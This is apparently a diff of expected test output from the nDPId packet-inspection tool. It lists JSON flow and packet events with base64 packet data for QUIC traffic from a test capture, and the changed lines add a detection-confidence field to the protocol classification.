 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02300{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1621499083794,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621499083794,"pkt":"AAAAAAAAAAEAO9I5CABFAAVijipAAH4RD1eokEAFubq3ucBBAbsFTq7MzP8AAB0IRh+k7PM1K8oANwAxa5vCXNWzfj2PGJr2ZJppn9nfh6Ikx8R\/J2n3pB6hj93tRIJPjf+f1DrhXIYFADw2Oc+Fr21E\/SBJZyXpa0us70tz46tHGmOeBrCokS3GTXPLNs2f7i6PVg5iYBx2tk44g5C8Qs71ezbhVdCLpeHqgEt\/KgFUjX37SuS08dzh1hVBp8Jk3e+0\/4OclX8JP31qwN8hw4wkaeOcFhqGvTvb7GXAVee+0nZmchwlYaeZu2t0+br+FVqhd9lHLvrcyz7DhDlFCTLeKywE2b3EdmYTKWQbL+AaOaELDauoXSTh5q70gLIFBtuSXXAm1sLAL+gBd6WGAsCkwCZK7IBbXbpfWhwnxlVgDIPibi\/nJn1TA586o7oqTn7ceMNjjzs6CB4Mgf4cOzn1YbtrCp\/6c+BO8SdxtB5t2vkCmwP5K7T6LfjBIuFXQ2o66LBu8vSKvZAtVO2yj+LkUyzGXrYGwfv92RyYG7LfM\/qS18M93d\/jLQZxmPy5yiGfWVxPGI0CPYVZsfmSBJekaJCKENQtKqBFs6AVPQwEuwFcacGyY3xE6s1Lu4QTKe\/QxafP6viMrvTQxzW0bcasUyFE1R7C9iQNIeJ9yKNA39s4GHvCsBht5FKpCx9AeuLYalRseEn8YWrDkPowTqNRxe0MscA8q6SQSy6jR0pOiyDsuL3gqILv\/SY8Rac1R05nZiLplGpiGDhE9pweKrCSsLdVSYAwcW3WvtmtNMX4EmbGMMrtnYEWdvuR4n2IdSRyv9gEYX6Q8hzoHG8BLHi+9db7fSutvIgwHCOUrjIPrH1I3iuMdZlcts6TP7n\/rLuIJQ90AfdfuDPtfyv1mHgxzTtaN2PTxwVb6duplHtdyIHwQW4JxQZkf9eUmK3IFE1g8uPWvlB3korqRC3X0AcAV+sx3QBx\/qT\/7gF6DFP2pyevadhyCvcOrG457OyVD1AcTPiu4iyRPIPs0ZJvBKST0kuFIAK1RoJYGXKAWb6J9ZLx+s6hzq\/1f\/0fVYymn2hbZDLHShxwbQkfEQlrOwalUO2ySwNcLdHaWrgafMwU1Jqwy3c2Wh9mqTVQACa1BySgEpwrkwNkoUZ7lai8AVhdHtwXYpL1gB\/TH91SWvUyF9Dvtha9t5tE0iXlmpfJuZOaqCkHSIu0XSKSxIBe2ySee8BdNbxqds4tKl3kUNeesA0aLrk5BIYrRjA9iqsg5i85TcPN7ilOO\/einXalctu3yF2I12P95cnmn8dVV+5aGLhS7eTX+TflkPHiEhNljw7cP3w4P+5GLFwM5tudCaDLA6afeuHwRmNyu4EHuYIuyQ95\/VnxA50tA8cTxnIXtWDvz\/V\/1jC10E8ZRQOx5RAzeQuGCKL+yBkb5e6xUFflBWfYCece3PTocANgv7MamRt+5dIoEcXIWJrMMSlrfY87Sjfbdyjyitgx\/3GErSHkqQjzECLn35cePuOYXjGdauoaI0FdXFxX0N4pWRgIFSMOMgv7WGHyUa7JL2uW1l6IWs4\/VyxVO7nYI1RKa0HSXbv+H2wrJyMWxXEF+FapMN8qENUanZn0DBN3nS29l14g27PiX1KosPCMvNsAEyL+FHupF8wbuG7hhioKZRauujDguEg9ExQ0m3tL2dBvtN5ROVDD26LyzDaWTk5zwZ2+bt9\/cncF+BxskyVsaDrMG5BAD+R2MBcjstM8WCqDrGmpTzd\/RDmbyfQ94p8EE9NW4bT2joZcpOovGfpfSmOfPG01l3k3sCykGLsIrKUzsxdgNn2SuQjCvYA92JZ4glYI"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499130835,"flow_last_seen":1621499130835,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621499130835,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1621499130835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621499130835,"pkt":"AAAAAAAAAAQA+mr7CABFAAViautAAH4RX5w0uxSvxkodT+9mAbsFTpEZw\/8AAB0IgC3o3GMiP\/8AAEU0PdKy7uKG3ARNfT09pZj4weIAx8vl1AZI+zMCTSNcyqisuLogUxNuVvaYt3\/glQ+D6lndRNMSuyW6j5yustnSGakysxsalXmdT1UcNTCHKHLeg8MGYbFf1nX95GwKiEKdI50HtYAVtBQjTNOTIu4nPcMX+lDl5V6\/ytmtC7XiQnbKGjmWQm\/5MDqEu40hggsQtcdk2jnQjgDTlviz5K19+Tr1C9ZtBh0pIi4\/9HJR25mhrL6n0N1dPzZ\/Sqk4b9t3u89S9E30HZYdBGpKBZsCH9hWFAhEmi7j9zZtGj\/cxAMeBcWRYInSCSDQRHhlkWsdmuRhy3Q07JJw\/pEuGWxhUDuVEci8KtERueLkLLLpEexZVihN4fEprEovribmXQoru+8BTBV+JKFqpyK44xLUOIK69w2LDvW\/c9dPKklcJAIVdwv\/H0kgY4YqDOIxKOP84t7SjU2P\/ow0Hgn\/JAdJ6i\/lHci\/A9+cu9\/Xk16H553fgdhUwRGo3ALZoNMzPzZ1o3fb5FWDfOha3mWIsBgUxeNt4buHg+jzgWf7W+8y6hmDLWrPKxyW2XOx6tYTJz3Xjs+\/mCn0wh\/mAZ+1hWOefp3U2Y80XBDgcJQRXavyO05wNoq15SpWKscYO5J7keXA83swiPGep5RyjOBdKfiII0v1ao+0rcEj0azRi8HmEhA\/AjmGfVSAAHVwBUamRC5+huXrgR7MEVx67+etgSdyuW\/yAF8xKZdh7YH+6wKsN72y7zdLpHJKk0SbAUI46TifMcEIMeIjlEPcVZXIE5rZ5rAAIrKbutpPELqhKDRo+C3oR4n9djDZXmF+B4O61eZoj26V8iiMi3Ap\/CD+ILTxN1vpLCz34kzpWw+Nvi\/ei8CsOgprWtklqFizkd0rAcDGEQGgQUmScGmGMEFTP7Tg2c0rd2YIJhDkQOLfYLZbFQ53RWO0Pggj\/QDl2rb91M5mdkJT0X64J45SyH9PR\/Q3NGgNCplgG+Zi1JMbY22khGyCv03BTfHcT6hnjWVcK0KimWhXdtO40IIpbzn37UO9Luj5lbbwTxA+F15tWNy3XlcT29pBTkrxIoD1a7jgZwe2L1\/Ov4CPoXZLMCQMQHvebHhxwgktEDCOQHeufOAARA9+ttGIYLmddJgygIHV+Z0m9eIUy9kSZvBlaoiT+1q5FRgi4aM7OXeRlcCnvKKLkhgPWsdD0iPMWVSO46LUV89lhtNMGfdtBxkfsOg+W5oXMWMpj9KmR6kowFzf9zj2QyWQFYmhpTbluKm3xfoGLLarkejEApaHi42nZxpainN+yR4Xj1CvqK7729lw20TkDJxJys8CkR6zRpnmDL275nTf\/h6umI\/BjPRIRIgbx3bSDq20ohdXKRrSZXC\/Arr5YfL+XhMgAUJbz3r4XwrrmclpOMMJn2kr\/gs3To4em\/HdWYqxdT6aST7ERX9KK04xNC6\/hrkuQzcRruUkuY3mUT8iKJjTr46ie2j\/A1tng3m3VKM0t\/2rfAm08hZWqsveRgilR3Zm78b9fgxj9VY8tmIh3i6sK\/djJUOnInRG631tWG0Qe1eRXSJgMeHizDi47oScl6deUbLalH1IvbrClHklGE\/ZcbaAKgwr43r+5MEM4cfDxEWqZaPxzsAHgwOhwkmTZ30Jhi+c4as8kD0LDD4tAMnjZY1FLuGbtQbU3BlRBN9KIN1hHKMv01OPEqvqTE8yp4iGqB9BypJrEEtRX\/ZZWohZEKxDzLUAu7MMY9Va00pq66LfRVHtgBgFkrrN5Dlw320q"}
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499130835,"flow_last_seen":1621499130835,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621499130835,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
+00699{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499130835,"flow_last_seen":1621499130835,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621499130835,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1621499131134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621499131134,"pkt":"AAAAAAAAAAQA+mr7CABFAAViavhAAH4RX480uxSvxkodT+9mAbsFTiPZy\/8AAB0IgC3o3GMiP\/8AAEU0xNPHNjkzcBN6tG3CMXMgN1VQUQ5zORwwdJvxC+4U4Wo768p0CS6oitGkvJZyjwyc3OomATdmVH8dl4u8+5ZoRqU5nHzh8arBwEn1ailAEl2\/FeLrAKukjlpYd2Uk6yjAdkKgzRJUrt7\/axFA3LL6O7tdgC5hzo0E0\/vl4YnagMJM3wjFjjHYO2MS55fyThkTKtMGKHzAVPiKv2kKUgzu3g8FlFf4vERg7PBca9iFQwa1e6czfFLHU3jmlRamr1hxIWC8ey9XXVda7oP9kCT82UgKpNgsvn9ag0yB6QxqI6o91lGsTfzgwNOJcVvwV3aY2qjfabeDbzPU82GWmC8dcxg60wWM23VAAZlVYaqE14ppMMyorKrKFMn+86H5\/aNgSXh0MxcYpilmN6MgsD5Jpkp6OIphsmHoNdSCO0UVCwGJhSGovYG83XAmetDlCEUuBf6MaZFXBjrfL+9+VHX4irSmtkovc6L5vSe3Nf\/Ub6qgARu+YW6Wwl4tUjGEcM7JKUQxN2Ukg1PimEsh9oAZ12nyYh9FV1JccWxNJ2iNa0HzjjZKFHsI+Wpn2wjQu6fGLrQdYisl3dxVlFj4jvRBju6QBGPqW8L8vdchXv3SI7zqO+NhEBqeCwisAVMGs3\/e0eLRoiqrlCvpzdd6wmWwzublWtkESFBS+GKBzAzbuO4L4Jk3UFfDunCYtqzhO+2c92mAtqsWUkc7CKf7i5TjKJZM8unl261yU\/jXeb6zhnBK28FD6Pf7vze97LmpT5VanmKiGpb8ZFvlX5LvJwFqOst\/Op1D8Xr+i6cOe2zujddvgkGRpWHduSyvlJRv5eRBop0FHOugDZjHwRl1P5GOEDM7AA1rf2k\/IZ6eHOqZsGK6AJyenzNCgwn2VrrkC9JsT5B02qcBGp2ieI1StsetnNDeBxqD01kqrPTmpVvwJxCy2yxgJrEXUggkwFbWIS7thWSjjhXDU0J1GP9L68+5UUKxu0743nekpL+HTPJD4N3h3CVTgzlGthPYulkO8tpw\/xmwb4Z53Jqw0aGKoz+dhDGMih5n97yaHi969BtPXsVrXOzMwgYDcGdHV6VGFDrRp8MvBHKVCcSB29+r+o\/y7gXXTkYGvFUdNPQnjtOPuTA3g6ED4ZH8pHwnFuthO9KrwMMPO0Bmio3US2E5BtPsHcZEVYe8RumZt3y1QcMWOvon\/UMvBjIjvrv0jsdmxjixC9tBFNbGe7r97P3sSHcFQ62T6BzS\/+NgBh1Yy4NhP5OC50DrYOUUKT2FWmyPF3rEeN7cKlVvDoToDTZvmnHz0lXki3TSjmEpfEl8VTrO2dVRjEyX6UGi07VXGODj7O0oDpUYCDjmG1IY0i\/swPCy3NuNEJt8yL0p3nKFjn1FYCc72eaCLxOWLqdkUlTWvm8YpTERh\/\/2jrhdGM0qtsJ7FcXHR51v4J\/QVf7rdJwPLrxNThdnZTGK4C1SIOXmUd+I7RAsVphCtMqkYz2xSC9bj0qFHuk+dNgchK\/qNK7D\/3TQluL6drX87zcJEWbeEAz++Bs4gMrOfH1c41XMna9bpL8uXPg\/gpvGR2NJd9tPrZADqH\/l\/5rjIhOiUnkWVyo0TCuowGc1U+R+LzRsroJKH\/6INUIkFvJyqDDWDuiqbuF4a8ofyZWpGKXbY6tbrxR5vwaHY6nEBEtgpQDNpXreT8uG1VJNuS0qFW1sMAQeSlsJF2xsZqjv925b07nSHBK8aJ++l8pku10eV9oj5mc55it2ZlpB3G4BEsXbBXW0kaMazv8X"}
 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1621499131747,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621499131747,"pkt":"AAAAAAAAAAQA+mr7CABFAAViavlAAH4RX440uxSvxkodT+9mAbsFTucGw\/8AAB0IgC3o3GMiP\/8AAEU0O8kVjzdhFbU85yBt1iwqehVgv2Jezj6mn9SdO\/xAMoQ6Qj2CZu4L+khp0ED4qwgVsRimpW9+019RfzBmCFh99aBBiZCv05rUnXo\/AfLOGNQtnfLnIt22QaI4txCY1wQh4\/Yqe+fANHZK\/ZmF\/8jsdmd71qfw03URemmchuDEmTC2QyCtQDR6IgH1doVCRoOWgfqOlswkaRTmqWfAdyO82HcYIhAl\/HvuxVmWaTRo+N+1Uvg3vOoeFbmkRfA3yUNsNKKXj3CuZnmwqgawAkhvUNunDuSNb6sXcWQSLMYzSYokvzGSrnCUFzWEzLjsIIkXyik5WMtbabj\/rXxW\/BmKnGxQAsyLYjlGWLl8IsRIUrFFSYYnArQnHAypfPl5sP2d4bIyERB5Xk+W0ngzdIfL9its1S\/1UVAsH\/LCTr4l85qg6B3o5lI7DKEPxygD1vV7v2kHUJUOsz6IQEA5cB8per0TSrcw70EjOs2PB2X\/KlkRtnF3cJ9mBrlLk7KkAdUnU+mv18q7Ur\/HRCeSKZ1IDGV+ySb3Pkkbb41pvETv2t9LoyQAD6Lzg0sSPQ7JLV2KhP1jHyct5463eYlSDK4lKsa29bix2j9nRvZdlPAs7HziAX+7Yre3QLRHAPqf\/Fg1bbLM5UQ4fWOBRZxhjJcdvgOJYkAXggHGTSKUtw58FK258BEuvGOXPaZLUbUPnco5cBPBIPnVm18eagNa8I5hoD3V4qJwr9MuaRW9lHG4afIywkdpNhJvwCaU0fJZ7zWnop85QgRGJTV5214WTZL+EUJZ8twDwaNzSY1ggAfatI1G32TefYqPxD0muHegRu5a+vh6GU9Nr4OZ\/spphiT2QHSVclDaYx2okizMN5ZYBs0bQln9i6XBm2Xldh+51uDHmQ4Zzp5v5YqyrRXhV0FfzvxrdzKY7KJJQgW29XcUFfrN5qG1mzTku37OdUh4OsIIhl78ZXl7b4B4gtfU2MlbyD0x5w27\/HBKRN75vA6sVD4434hZz0CVYEpHiS\/\/F+U03dYEtR9fBHiid5ECmvh8ygYyirip51ZPSMQ+xf+D7QciO3qwP0jr6a1lkCiOGvIgtxOPSkwBE14jvn4b4AgoxAwzxMoNWG+KiIzQcc5d77j3SVtd+zufZsoTaSVxvbWmtRH0a31c5XS8D\/F0m+6IrOG+sVg+DE76dDddFTb+w9dffyNc0Dy2WGhcNHMlytYl3hpyDxLT5XyRXvjxA0\/VLZiYU4eZ4ElyHnvoUsVc1zIaglmrF+UZkxVlMip6nMHZ9lAEsM5\/RJYf6oyNArAqc\/usJ\/9w+reh+ZP71fVKQMu8hkbAHifaXr7zINN8beOioIt1MpZKpcyaXZRCKvAOiunMN2HFg7gb4p\/O\/EYfkBy\/QNmvkqv63ADfvqVNbE3rlc1Spji+jLBIq3nPFuy\/5gX\/hKpM6V+1cWwiQk9pBOX4ZM5SBBKjwpGA59adqr0mV2fpXKtxohrt1P7YEzdHgk6wi5UR4cnhpR6ATzawptEewUpLpO9E5\/GgMkhT3mM2LdLlAJbflcld+TxymmmNvb3UpmjyGh3\/j4AG85zZBWQGL4jZJFWwd8JkedM8UyyY3+J7Hf7Llgt2XBjEica1HmobGyVnvxPpQPkJ3hFFYALzmeLaq88STNOaZPk6gzd8otilv70M1Uie7Wd78Y3H+OJSDOFEeZSWpO7cC\/0ENxs6hxSkpuU\/vHtior07jJ7OPSapjbYusV4q2O8nnSUJJ+wHjLAkldls5Mo1vwKpLEojKmMh"}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621500710201,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621499130835,"flow_last_seen":1621499132950,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621500710201,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500710201,"flow_last_seen":1621500710201,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621500710201,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02297{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1621500710201,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621500710201,"pkt":"AAAAAAAAAAQAXWCjCABFAAVidHpAAH4RAzE0uxSvZsLPs9AMAbsFTi9Ky\/8AAB0ItCn86+Se4YgAAEU0MHhrfbtIJTtH3QVY6F3aeUtwMPN+HFDoLuLJNWWF83Oo91F\/IrU\/4VzzpTeT2Fs3WeheARS7a3eJ6+jBx50KgL2Mtap+DJiMUnv5+MiK\/lUO39U0cv8d7GpIK\/I60LKV\/5UKO3hYdAl9H3sKf\/17sYn0RqCxn3h27SFb14UfQMrK5fzHbBIcyCTwAI8EH1FUNiii2EHC6MKWOlasY1W7tTdhYLqIJe3Pnw\/eMMH4EH67C816p5GMiQfDThgfQ2wgQHnziUTQvAMRReqOG70usUWRBc0H+BQ8YvPfZECfgPywP5jcJ6yFiW20NNxDHB6aoJ4Cj+YV3HYe3hWH6RtYkzgshfY2d5Z5SXiixf9F396ika8t5YhgzUJqm3qaduYkkuoKsKEzuoXUVwFjy4mdMVXENEyNoKQ+m7hVG2MtxWAe5F0iilBt4B+B47gPKblladD3cYJ89FSWeT4JmrpSKq+sitEawWg8mHrgGTQq7NYbu7N+XGgNwfYKSGmo+wJ4PZoiqprX5abZOW0AcEO4GmP23kcsiaw6jBKGRiI62wQkX3CdcrDC94UAE4ETeCTM7KGTkc2NjqYwxvCRWtYhRE2jKZjoxjsBPN71ErHefn1F+hbfKNlDzSGX\/XS29PsKXDs3Zy7d5AvyJhbeMO5c9ZW9Z367PIIkmQCfsx7uUon\/NyNKlzzrFPmj4\/Q5MNYmYJUzIjfkdbkREP\/oi3qdVUZRk6Qq3mEyntdw2m0x+Fl9NnJmI7wPyTSTYM1zGxtoprNKLZoKHPJUdriJdNO1mtZLgz\/iMksWRPpo1KJv17xWq6zVr1T5Rb\/56VZDZZTzvvnDR3LfObrvTjxHZjpDe470INkM91Ng4x1MGEIzMvtmxatbi7QsiBiDO\/OqdD1JZRhadEr1SeF+j+x3pCgDJPrTxUQNeLKGpDOINsHcCNzi9E6t6xSea+mxi6UCuZeVqiu7Mq6oTDEdYhM0f2zJdDmUwxt9ntbOaqb\/70GFQw3Pu6A6FPriLWgxfjbt820gGfdllAq3bd17xNlN89\/sslY71CRXr\/AXS9zW9TVm9cE3ieGVRvpPlBXLxR3CcDRad5beYHB2p+59RVP4JEz3gq5xGAJk56U10gDcUMuTu9lOP0LVK6rTCu109YNLsvJwHDQHJg6cMb9ghMycYjRH9R8GiFVxeXk8FZUVTPEwK19hu5R3J4CDXQi+bSlYR8ZWUeNFXdURMnp1LQodsU7HXmk0DNjXTkB48gPiecCbmUF+uqaDsBFruhCgfz1ajvkEGLeVbKosgz80uhsQmk3MpvR16f+ZOAa9cii2ACYegZ1+a4KEx2NvHlXUrXa2GOsjIAygu7UkwCjyJDh\/KLNwjSadZAQTyM7O4lGORdsjV5FzQj3iyRFzjEjdAaMYFQh7u74sj71sIjcdgnajLAngwvieEOhjfkDL0tvg0+xr2ScehwvmJTYQZ0A4LvQTGmQ0QSop8E3Bdjoib9O4UduuWyY49M20Z07qfK9fbUe3P7MyS0IssG5j+o2HGVtB2rGDGegUxPzqBriraNuRetc+27PYobO7JO3W\/n8cUzNrheWIWi9IB4U+pmyDcJIP58jjktd5G89dt6sAMJR3A5kbmIbJ9iNmSo5NdNog3tnD5t5HDujKlpjs5YYJJjfEpJdk07sWx3cs35o4J40ZUcj6dz2f5kyw3ZDKB\/hzEHArYpTkaJY4Gfn8PS30KdL4TNAJjWtoOfQevIKVcxh5IQLx0UwAHLDP4qnlqslqSloufJGz2Uh8"}
-00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500710201,"flow_last_seen":1621500710201,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621500710201,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
+00702{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500710201,"flow_last_seen":1621500710201,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621500710201,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1621500710508,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621500710508,"pkt":"AAAAAAAAAAQAXWCjCABFAAVidIBAAH4RAys0uxSvZsLPs9AMAbsFThGvwP8AAB0ItCn86+Se4YgAAEU01ef7l0UP4woUE5dsuDr8jBLUL6glp4Hay+1PVqJ1qjZhTrhZ\/HlCWneFdokdJJCHL9aLl4EI+zRfD\/McWX32i\/GREyeHr4lMy4TiI6zbvduEowF9eNA5Tp3OZ9GCbt+VMsYazwXNCMv7NFAV34d4tKKg3LHgAaEVn2Y+UbC2G+bYh+I3BU7O10HCLFpy7dljaBLe9qgbXIUuhMGDWNAnyQ+uYXiH2Jephgdag65enzMRnzpWg6tOxGmRHM\/sp7fpGYwk8PUnJ\/bg3wGtSnXhZccRwt0adDkhfdJ32tQWidjaGerN9H2lZ7O397QtbCs9\/8om91WjQ21YVaDo4Ipv8H0+f1V\/Cc42HBGsarDGnoyUmUg1jicgM5DPMJpvLG2UQQK5tiuC\/cbEV8WUL7QwOcxB3jbJTnxR1MHJT3pp81ODQhzEb3PhIJ\/5Cs0fOuGXlljtXRHGXKKK9NsXQ0izy4kIRIbdXUZKKUe4T4svk7KGeA3O23ttudesKDm99vJFGPLYZ34JAet2qmXSBcBuHQHN4aXeGdVG7MFzyQ92k+oQwlhlcIAhjHVS07UHZXN\/vQViV2LX6DSII6bHO8BhhtxKEj+5T+AEO+gFSPXVLnsAtt9jbTLOZtW1OuAXvN2H99cPQ6kiz\/OG9Z9DeWz\/n4jYXXfnHNa1A5r8RPBukPjk+DreRRGc9TBqR\/n8DDhNakfL0Fck3RKiTr8g2Av+YbMsrLWtvcnoT0rNWL7JWLcj4+4\/jtD3F4oDSeZdh9waOz7hGXnbyoVX